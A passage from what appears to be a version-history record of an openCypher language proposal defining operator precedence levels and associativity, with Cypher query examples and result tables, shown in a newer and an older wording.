list comprehensions, have operands which are exceptions to this bottom-up evaluation.)\nIn other words, the operator tree encodes the evaluation order.\nFor instance, the following operator tree\n----\n *\n \/ \\\n + 4\n \/ \\\n3 2\n----\nencodes that the numeric addition is evaluated before the numeric multiplication, so that the expression results in `20`.\n\nHowever, the query string is a sequence of characters and not a tree.\nThe parser turns the query string into such an operator tree.\nIn the query string, nesting can clearly be denoted by parentheses.\nFor instance, the query string\n----\n((3+2)*4)\n----\nallows a parser to unambiguously construct the operator tree shown above.\n\nFor user convenience, better readability, and familiarity with common conventions in mathematical notation, openCypher (and most other query and programming languages) allows omitting the parentheses.\nFor instance,\n----\n3+2*4\n----\nis also a valid expression.\n\nWithout additional rules, however, it is not possible to unambiguously construct a operator tree for such an expression.\nIn the particular case, two operator trees are possible:\n\n- `((3+2)*4)`\n- `(3+(2*4))`\n\nTo avoid this kind of ambiguity, openCypher (and most other query and programming languages) has _precedence rules_.\n\nPrecedence rules (or _rules of operator precedence_) define the order in which the different operators, i.e. the different kinds of expressions, are evaluated.\nFor instance, numeric multiplication is evaluated before numeric addition, such that expression\n----\n3+2*4\n----\nis effectively evaluated as\n----\n(3+(2*4))\n----\nand, hence, results in `11` (rather than `20`).\n\nThis CIP states the precedence rules of openCypher.\n\n== Proposal\n\nThe precedence in openCypher is defined by (1) _precedence levels_ and (2) _operator associativity_.\nBoth are defined in the following two subsections.\n\n=== Precedence levels\n\nThe following <<precedenceLevels,table>> lists the precedence levels in descending order.\n\n.[[precedenceLevels]]Precedence levels\n[cols=\"<.<1a,<.<4a,<.<4a\", options=\"header\"]\n|===\n|Level |Group |Operators\n\n|12\n|Atoms\n|\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Literal[Literals]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Variable[Variables]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Parameter[Parameters]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=CaseExpression[Case expressions]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ListComprehension[List comprehensions]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PatternComprehension[Pattern comprehensions]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Reduce[Reduce operator]\n* quantifiers\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=RelationshipsPattern[Pattern predicates]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ParenthesizedExpression[Function invocations]\n* 
https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ParenthesizedExpression[Existential subqueries]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ParenthesizedExpression[Parenthesized expression]\n\n|11\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PropertyOrLabelsExpression[Graph element operators]\n|\n\n* property lookup\n* label expressions\n\n.3+|10\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=StringOperatorExpression[String operators] (left-hand operand)\n|\n\n* Prefix predicate (and right-hand operand)\n* Suffix predicate (and right-hand operand)\n* Contains predicate (and right-hand operand)\n* Regular expression predicate\n\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ListOperatorExpression[List operators] (left-hand operand)\n|\n\n* List element containment predicate (and right-hand operand)\n* List element access\n* List slicing\n\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NullOperatorExpression[Null predicates] (left-hand operand)\n|\n\n* Null predicate\n* Not-null predicate\n\n|9\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=UnaryAddOrSubtractExpression[Arithmetic additive inverse]\n|\n\n* Unary negative\n* Unary positive\n\n|8\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PowerOfExpression[Exponentiation] (left-hand and right-hand operand)\n|\n\n* Exponentiation\n\n|7\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Arithmetic multiplicative operators] (left-hand and right-hand operand)\n|\n\n* Multiplication\n* Division\n* Remainder (Modulo)\n\n|6\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AddOrSubtractExpression[Arithmetic additive operators] (left-hand and right-hand operand)\n|\n\n* Addition\n* Substraction\n\n|5\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ComparisonExpression[Comparison operators] (left-hand and right-hand operand)\n|\n\n* Equal\n* Unequal\n* Greater\n* Greater or Equal\n* Less\n* Less or Equal\n\n|4\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NotExpression[Boolean negation]\n|\n\n* Negation\n\n|3\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AndExpression[Boolean conjunction] (left-hand and right-hand operand)\n|\n\n* Conjunction\n\n|2\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=XorExpression[Boolean exclusive disjunction] (left-hand and right-hand operand)\n|\n\n* Exclusive disjunction\n\n|1\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=OrExpression[Boolean inclusive disjunction] (left-hand and right-hand operand)\n|\n\n* Inclusive disjunction\n\n|===\n\n[IMPORTANT]\n.Rule of precedence levels\n====\nOperators on level _X_ take 
precedence over any operator on level _Y_, when _X_ > _Y_, i.e. are of higher precedence.\nOperators can only directly accept operators of higher precedence as operands.\n====\n\nThe rule of precedence levels is enforced by the grammar.\n\nThe rule of precedence levels does not apply to all operands, though.\nThe table points out to which operands (left-hand or left-hand and right-hand) the rule of precedence levels apply.\n\nIf an operator has operands to which the precedence levels do not apply, these operands are syntactically delineate such that there is no ambiguity with regard to the operator tree.\nFor instance, the syntax of the list element access clearly delineates the list element index operand by brackets, e.g. `myList[5]`.\nSuch clearly delineated operands grammatically allow an expression of any precedence level, i.e. grammar encodes the operand as https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Expression[<Expression>].\n\nA prominent expression with a clearly delineated operand is the _parenthesized expression_.\nThe parenthesized expression has a single operand delineated by parentheses, i.e. `( n.prop+6 )` where `n.prop+6` is the delineated operand.\nThe parenthesized expression has no other purpose than grammatically allowing expressions as operands that do not meet the rule of precedence levels.\nFor instance, an arithmetic addition cannot be directly an operand to an arithmetic multiplication by the rule of precedence levels, since addition is of lower precedence than multiplication.\nHowever, with the help of a parenthesized expression, the user can denote\n----\n(3+2)*4\n----\nas a valid expression.\nThis achieves the desire operator tree\n----\n *\n \/ \\\n ( ) 4\n |\n +\n \/ \\\n3 2\n----\nwhere the arithmetic addition is an operand to the arithmetic multiplication and, hence, results in `20` (rather than `11`).\n\n=== Operator associativity\n\nMost precedence level include multiple operators.\n\nOn some levels these operators are grammatical alternatives, e.g. 
for https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Atom[<Atom>s], and, hence, have unambiguous precendence.\n\nOn other levels, however, the grammar allows repetitions of such operators (chaining).\n\nFor instance, all the following are valid expressions:\n\n* `--+-5`\n* `5 + 4 + 3`\n* `5 - 4 - 3`\n* `5 - 4 + 3`\n* `5 * 4 \/ 3`\n* `5 % 4 * 3`\n* `5 > 4 >= 3`\n\nAssociativity of the operators define the operator tree unambiguously for such expressions.\n\nChains of operators fall into four categories:\n\n* _Chains of type-incompatible operators_\n* _Chains of closed unary operators_\n* _Chains of binary operators_\n* _Chains with extra semantics_\n\nEach is discussed in the following subsections, respectively.\n\n==== Chains of type-incompatible operators\nThe grammar allows chaining of some operators in https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=StringListNullOperatorExpression[String, list, and null operators], which are\n\n* not type compatible or\n* only type-compatible in one possible way,\n\nsuch that there is\n\n* no valid operator tree or\n* only one unambiguous operator tree,\n\nrespectively.\n\nFor instance, grammatically allowed operator chains without a valid operator tree are:\n\n* `'string' STARTS WITH x [1..3]`\n** `('string' STARTS WITH x) [1..3]` is invalid because list slicing does not accept a boolean as first operand\n** `'string' STARTS WITH (x[1..3])` is invalid because the prefix predicate does not accept a list as second operand\n* `foo CONTAINS 'bar' ENDS WITH x`\n** `(foo CONTAINS 'bar') ENDS WITH x` is invalid because the suffix predicate does not accept a boolean as first operand\n** `foo CONTAINS ('bar' ENDS WITH x)` is invalid because the containment predicate does not accept a boolean as second operand\n\nFor instance, grammatically allowed operator chains with only a single valid operator tree are:\n\n* `foo STARTS WITH x IS NOT NULL`\n** `(foo STARTS WITH x) IS NOT NULL` is valid because the not-null predicate accepts a boolean as first operand\n** `foo STARTS WITH (x IS NOT NULL)` is invalid because the prefix predicate does not accept a boolean as second operand\n* `foo CONTAINS 'bar' IN list`\n** `(foo CONTAINS 'bar') IN list` is valid because the list element containment predicate accepts a boolean as first operand\n** `foo CONTAINS ('bar' IN list)` is invalid because the containment predicate does not accept a boolean as second operand\n\n[IMPORTANT]\n.Chains of type-incompatible operators\n====\nChains of (partly) type-incompatible operators either\n\n* do not have a valid operator tree at all, or\n* have only one valid operator tree.\n====\n\n==== Chains of closed unary operators\nClosed unary operators that allow chaining on the same precedence level are\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=UnaryAddOrSubtractExpression[Arithmetic additive inverse]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NotExpression[Boolean negation]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ListOperatorExpression[List slicing]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NullOperatorExpression[Null predicates]\n\nExample expressions are\n\n* `--+-5`\n* `NOT NOT 
NOT false`\n* `list[4..17][2..5]`\n* `x IS NOT NULL IS NOT NULL IS NULL`\n\n[IMPORTANT]\n.Chaining of closed unary operators\n====\nChains of closed unary operators have an unambiguous operator tree.\n====\n\n[NOTE]\n.Associativity of unary operators\n====\nThe grammar defines if the operand of an unary operator is on the left end or on the right end of the operator's syntax.\nThis renders the operator left- or right associative, respectively.\nNevertheless, the grammar allows only one unambiguous operator tree, in both case.\n====\n\n\n==== Chains of binary operators\nBinary operators that allow chaining with themselves of other operators of compatible result type on the same precedence level are\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PowerOfExpression[Exponentiation]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Multiplication]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Division]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Remainder (Modulo)]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AddOrSubtractExpression[Addition]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AddOrSubtractExpression[Substraction]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AndExpression[Boolean conjunction]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=OrExpression[Boolean inclusive disjunction]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=OrExpression[Boolean exclusive disjunction]\n\nExample expressions are\n\n* `5 * 4 * 3`\n* `5 ^ 4 ^ 3`\n* `5 \/ 4 \/ 3`\n* `5 % 4 % 3`\n* `5 % 4 * 3`\n* `5 - 4 - 3`\n* `5 - 4 + 3`\n* `5 + 4 + 3`\n* `TRUE AND FALSE AND TRUE`\n* `TRUE OR FALSE OR TRUE`\n* `TRUE XOR FALSE XOR TRUE`\n\n[IMPORTANT]\n.Chains of binary operators\n====\nIn chains of binary operators, the operator have left-to-right associativity, i.e. for every two operators, the operator appear earlier (more left) in the query string takes precedence and the operator tree is left-deep.\n====\n\n[NOTE]\n.Associative binary operators\n====\nWhere the semantics of operator is associative (e.g. addition), a right-deep operator tree produces the same result as a left-deep operator tree.\n====\n\nConsequently, the examples evaluate as follows:\n\n[cols=\"2a,1a\"]\n|====\n|\n[source, cypher]\n----\nRETURN 5 * 4 * 3 AS a,\n (5 * 4)* 3 AS b,\n 5 *(4 * 3) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!60!60!60\n!====\n\n|\n[source, cypher]\n----\nRETURN 4 ^ 3 ^ 2 AS a,\n (4 ^ 3)^ 2 AS b,\n 4 ^(3 ^ 2) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 4096.0 ! 4096.0 ! 262144.0\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 \/ 4 \/ 3 AS a,\n (5 \/ 4)\/ 3 AS b,\n 5 \/(4 \/ 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 0 ! 0 ! 5\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 % 4 % 3 AS a,\n (5 % 4)% 3 AS b,\n 5 %(4 % 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 1 ! 1 ! 
0\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 % 4 * 3 AS a,\n (5 % 4)* 3 AS b,\n 5 %(4 * 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 3 ! 3 ! 5\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 - 4 - 3 AS a,\n (5 - 4)- 3 AS b,\n 5 -(4 - 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! -2 ! -2 ! 4\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 - 4 + 3 AS a,\n (5 - 4)+ 3 AS b,\n 5 -(4 + 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 4 ! 4 ! -2\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 + 4 + 3 AS a,\n (5 + 4)+ 3 AS b,\n 5 +(4 + 3) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!12!12!12\n!====\n\n|\n[source, cypher]\n----\nRETURN TRUE AND FALSE AND TRUE AS a,\n (TRUE AND FALSE) AND TRUE AS b,\n TRUE AND (FALSE AND TRUE) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!false!false!false\n!====\n\n|\n[source, cypher]\n----\nRETURN TRUE OR FALSE OR TRUE AS a,\n (TRUE OR FALSE) OR TRUE AS b,\n TRUE OR (FALSE OR TRUE) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!true!true!true\n!====\n\n|\n[source, cypher]\n----\nRETURN TRUE XOR FALSE XOR TRUE AS a,\n (TRUE XOR FALSE) XOR TRUE AS b,\n TRUE XOR (FALSE XOR TRUE) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!false!false!false\n!====\n\n|====\n\n==== Chains with extra semantics\nOperators whose chaining gives extra semantics are\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ComparisonExpression[Comparison operations]\n\nExample expression are\n\n* `5 = 5 = 5`\n* `5 = 4 <> 3`\n* `5 <> 4 > 3`\n* `5 > 4 > 3`\n* `5 > 4 >= 3`\n* `5 >= 4 < 3`\n\n[IMPORTANT]\n.Chains with extra semantics\n====\nChains with extra semantics, either\n\na. form a flat operator tree of a single operator, or\nb. their semantics is defined by a syntax transformation to an expression that has an unambiguous operator tree based on the other precedence rules stated in this document.\n====\n\n[NOTE]\n.Associativity of comparison operators\n====\nBecause of the extra semantics of a chain of comparison, the comparison operators do not have any observable associativity in openCypher.\n====\n\nConsequently, the examples evaluate as follows:\n\n[cols=\"2a,1a\"]\n|====\n|\n[source, cypher]\n----\nRETURN 5 = 5 = 5 AS a,\n (5 = 5) AND (5 = 5) AS ax,\n (5 = 5)= 5 AS b,\n 5 =(5 = 5) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! false ! false\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 = 4 <> 3 AS a,\n (5 = 4) AND (4 <> 3) AS ax,\n (5 = 4)<> 3 AS b,\n 5 =(4 <> 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! false ! false ! true ! false\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 <> 4 > 3 AS a,\n (5 <> 4) AND (4 > 3) AS ax,\n (5 <> 4)> 3 AS b,\n 5 <>(4 > 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! null ! true\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 > 4 > 3 AS a,\n (5 > 4) AND (4 > 3) AS ax,\n (5 > 4)> 3 AS b,\n 5 >(4 > 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! null ! null\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 > 4 >= 3 AS a,\n (5 > 4) AND (4 >= 3) AS ax,\n (5 > 4)>= 3 AS b,\n 5 >(4 >= 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! null ! null\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 <= 4 < 3 AS a,\n (5 <= 4) AND (4 < 3) AS ax,\n (5 <= 4)< 3 AS b,\n 5 <=(4 < 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! false ! false ! null ! 
null\n!====\n\n|====\n\n== What others do\n\nopenCypher has grammatically all operators in one precedence level hierarchy.\nThis is similar to how precedence is defined for more programming languages.\nFor instance:\n\n* https:\/\/docs.oracle.com\/javase\/tutorial\/java\/nutsandbolts\/operators.html[Java]\n* https:\/\/docs.python.org\/3\/reference\/expressions.html#operator-precedence[Python]\n* https:\/\/en.cppreference.com\/w\/cpp\/language\/operator_precedence[C++]\n* https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/JavaScript\/Reference\/Operators\/Operator_Precedence#table[Javascript]\n\nThe precedence is similar.\nSome minor difference:\n\n* Programming languages have extra operators openCypher does not have, e.g. increment\/decrement, bitwise operators, ternary operator, and assignments\n* In Javascript exponentiation is right-to-left associative\n\nSQL encodes large parts of the type compatibility of expressions in the grammar.\nHence, its precedence hierarchy is partition by type.\nWithin one type, SQL's precedence hierarchy is similar.\n\nChainable operators, such as addition, multiplication, etc. are left-to-right associative in SQL as well.\nHowever, SQL directly encode that in the grammar, with left-recursive production rules, e.g.\n\n[source, ebnf]\n----\n<numeric value expression> ::=\n <term>\n | <numeric value expression> <plus sign> <term>\n | <numeric value expression> <minus sign> <term>\n\n<term> ::=\n <factor>\n | <term> <asterisk> <factor>\n | <term> <solidus> <factor>\n\n<factor> ::=\n [ <sign> ] <numeric primary>\n----\n\nMost program and query language do not give chains of comparison operators extra semantics.\nTypically, comparison operators are left-to-right associative.\n\n== Benefits to this proposal\n\nThis CIP clarifies the precedence rules of openCypher.\n\n== Caveats to this proposal\n\nNone known.\n\n\n","old_contents":"= CIP2021-08-10 Operator precedence\n:numbered:\n:toc:\n:toc-placement: macro\n:source-highlighter: codemirror\n\n*Authors:* Hannes Voigt <hannes.voigt@neo4j.com>\n\n\n[abstract]\n.Abstract\n--\nThis CIP defines the operator precedence rules of openCypher.\n--\n\ntoc::[]\n\n== Background\n\nThe expression sub-languages of openCypher (and most other query and programming languages) allow very liberal composition of different elementary expressions into complex expressions through nesting.\nElementary expression the kinds of expressions the expression sub-languages provides and which for the building blocks of the sub-languages.\n\nSome elementary expressions have zero operands, e.g. 
literals.\nMost elementary expressions have one or more operands.\nFor instance,\n\n- An arithmetic negation has one operand,\n- A boolean conjunction has two operands,\n- A property access has two operands -- an element and a property key,\n- A function call has two operands -- a function name and an arguments list,\n- A list comprehension has three or four operands -- an element variable name, a list, a predicate, and optionally a projection expression\n- A case expression has multiple operands -- a value to test, for every case a test value\/predicate and a result value, and a default value for the 'else' case\n\nSome operands expect non-values, typically identifiers (variable names, function names, property keys, etc.).\nSuch _non-value operands_ do not allow nesting of expressions because expressions only result in values.\n\nHowever, most operands expect values of certain types.\nSuch _value operands_ allow nesting of all expressions that result in a value of the expected type.\nThe nested expressions form an _operator tree_, which is typically evaluated bottom-up, i.e. all expressions that provide an operand are evaluated before the expression that takes these operands is evaluated.\n(Higher-order expressions, e.g. list comprehensions, have operands which are exceptions to this bottom-up evaluation.)\nIn other words, the operator tree encodes the evaluation order.\nFor instance, the following operator tree\n----\n *\n \/ \\\n + 4\n \/ \\\n3 2\n----\nencodes that the numeric addition is evaluated before the numeric multiplication, so that the expression results in `20`.\n\nHowever, the query string is a sequence of characters and not a tree.\nThe parser turns the query string into such an operator tree.\nIn the query string, nesting can clearly be denoted by parentheses.\nFor instance, the query string\n----\n((3+2)*4)\n----\nallows a parser to unambiguously construct the operator tree shown above.\n\nFor user convenience, better readability, and familiarity with common conventions in mathematical notation, openCypher (and most other query and programming languages) allows omitting the parentheses.\nFor instance,\n----\n3+2*4\n----\nis also a valid expression.\n\nWithout additional rules, however, it is not possible to unambiguously construct an operator tree for such an expression.\nIn this particular case, two operator trees are possible:\n\n- `((3+2)*4)`\n- `(3+(2*4))`\n\nTo avoid this kind of ambiguity, openCypher (and most other query and programming languages) has _precedence rules_.\n\nPrecedence rules (or _rules of operator precedence_) define the order in which the different operators, i.e. 
the different kinds of expressions, are evaluated.\nFor instance, numeric multiplication is evaluated before numeric addition, such that the expression\n----\n3+2*4\n----\nis effectively evaluated as\n----\n(3+(2*4))\n----\nand, hence, results in `11` (rather than `20`).\n\nThis CIP states the precedence rules of openCypher.\n\n== Proposal\n\nThe precedence in openCypher is defined by (1) _precedence levels_ and (2) _operator associativity_.\nBoth are defined in the following two subsections.\n\n=== Precedence levels\n\nThe following <<precedenceLevels,table>> lists the precedence levels in descending order.\n\n.[[precedenceLevels]]Precedence levels\n[cols=\"<.<1a,<.<4a,<.<4a\", options=\"header\"]\n|===\n|Level |Group |Operators\n\n|12\n|Atoms\n|\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Literal[Literals]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Variable[Variables]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Parameter[Parameters]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=CaseExpression[Case expressions]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ListComprehension[List comprehensions]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PatternComprehension[Pattern comprehensions]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Reduce[Reduce operator]\n* quantifiers\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=RelationshipsPattern[Pattern predicates]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ParenthesizedExpression[Function invocations]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ParenthesizedExpression[Existential subqueries]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ParenthesizedExpression[Parenthesized expression]\n\n|11\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PropertyOrLabelsExpression[Graph element operators]\n|\n\n* property lookup\n* label expressions\n\n.3+|10\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=StringOperatorExpression[String operators] (left-hand operand)\n|\n\n* Prefix predicate (and right-hand operand)\n* Suffix predicate (and right-hand operand)\n* Contains predicate (and right-hand operand)\n* Regular expression predicate\n\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ListOperatorExpression[List operators] (left-hand operand)\n|\n\n* List element containment predicate (and right-hand operand)\n* List element access\n* List slicing\n\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NullOperatorExpression[Null predicates] (left-hand operand)\n|\n\n* Null predicate\n* Not-null 
predicate\n\n|9\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=UnaryAddOrSubtractExpression[Arithmetic additive inverse]\n|\n\n* Unary negative\n* Unary positive\n\n|8\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PowerOfExpression[Exponentiation] (left-hand and right-hand operand)\n|\n\n* Exponentiation\n\n|7\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Arithmetic multiplicative operators] (left-hand and right-hand operand)\n|\n\n* Multiplication\n* Division\n* Remainder (Modulo)\n\n|6\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AddOrSubtractExpression[Arithmetic additive operators] (left-hand and right-hand operand)\n|\n\n* Addition\n* Subtraction\n\n|5\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ComparisonExpression[Comparison operators] (left-hand and right-hand operand)\n|\n\n* Equal\n* Unequal\n* Greater\n* Greater or Equal\n* Less\n* Less or Equal\n\n|4\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NotExpression[Boolean negation]\n|\n\n* Negation\n\n|3\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AndExpression[Boolean conjunction] (left-hand and right-hand operand)\n|\n\n* Conjunction\n\n|2\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=XorExpression[Boolean exclusive disjunction] (left-hand and right-hand operand)\n|\n\n* Exclusive disjunction\n\n|1\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=OrExpression[Boolean inclusive disjunction] (left-hand and right-hand operand)\n|\n\n* Inclusive disjunction\n\n|===\n\n[IMPORTANT]\n.Rule of precedence levels\n====\nOperators on level _X_ take precedence over any operator on level _Y_, when _X_ > _Y_, i.e. they are of higher precedence.\nOperators can only directly accept operators of higher precedence as operands.\n====\n\nThe rule of precedence levels is enforced by the grammar.\n\nThe rule of precedence levels does not apply to all operands, though.\nThe table points out to which operands (left-hand, or left-hand and right-hand) the rule of precedence levels applies.\n\nIf an operator has operands to which the precedence levels do not apply, these operands are syntactically delineated such that there is no ambiguity with regard to the operator tree.\nFor instance, the syntax of the list element access clearly delineates the list element index operand by brackets, e.g. `myList[5]`.\nSuch clearly delineated operands grammatically allow an expression of any precedence level, i.e. the grammar encodes the operand as https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Expression[<Expression>].\n\nA prominent expression with a clearly delineated operand is the _parenthesized expression_.\nThe parenthesized expression has a single operand delineated by parentheses, i.e. 
`( n.prop+6 )` where `n.prop+6` is the delineated operand.\nThe parenthesized expression has no other purpose than grammatically allowing expressions as operands that do not meet the rule of precedence levels.\nFor instance, an arithmetic addition cannot directly be an operand to an arithmetic multiplication by the rule of precedence levels, since addition is of lower precedence than multiplication.\nHowever, with the help of a parenthesized expression, the user can denote\n----\n3+(2*4)\n----\nas a valid expression.\nThis achieves the desired operator tree\n----\n *\n \/ \\\n ( ) 4\n |\n +\n \/ \\\n3 2\n----\nwhere the arithmetic addition is an operand to the arithmetic multiplication and the expression, hence, results in `20` (rather than `11`).\n\n=== Operator associativity\n\nMost precedence levels include multiple operators.\n\nOn some levels these operators are grammatical alternatives, e.g. for https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Atom[<Atom>s], and, hence, have unambiguous precedence.\n\nOn other levels, 